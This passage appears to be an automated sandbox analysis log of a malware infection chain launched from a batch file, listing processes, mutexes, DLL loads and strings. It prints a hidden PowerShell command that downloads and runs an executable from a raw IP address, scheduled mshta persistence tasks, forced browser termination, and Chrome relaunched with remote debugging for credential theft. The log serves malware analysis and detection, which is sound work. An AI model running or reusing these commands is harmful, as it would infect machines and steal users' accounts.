                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Windows\System32\spoolsv.exeMutant created: \BaseNamedObjects\Global\mA5875B175B19A58BB789F567CBB9154
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Temp\mtzRdqIHD.htaJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" "
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\timeout.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 19be97887a.exe, 0000001E.00000003.1725567156.00000000058B7000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1755026979.00000000058B3000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1726156262.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1755198076.00000000058A6000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1872399715.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871373132.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: am_no.batVirustotal: Detection: 23%
                      Source: am_no.batReversingLabs: Detection: 13%
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: " /add
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: " /add /y
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: " /add
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: " /add /y
                      Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: rapes.exeString found in binary or memory: " /add /y
                      Source: rapes.exeString found in binary or memory: " /add
                      Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: rapes.exeString found in binary or memory: " /add /y
                      Source: rapes.exeString found in binary or memory: " /add
                      Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: rapes.exeString found in binary or memory: " /add /y
                      Source: rapes.exeString found in binary or memory: " /add
                      Source: bb5ad48269.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\mtzRdqIHD.hta"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeProcess created: C:\Windows\System32\spoolsv.exe C:\Windows\System32\spoolsv.exe
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\spoolsv.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\spoolsv.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
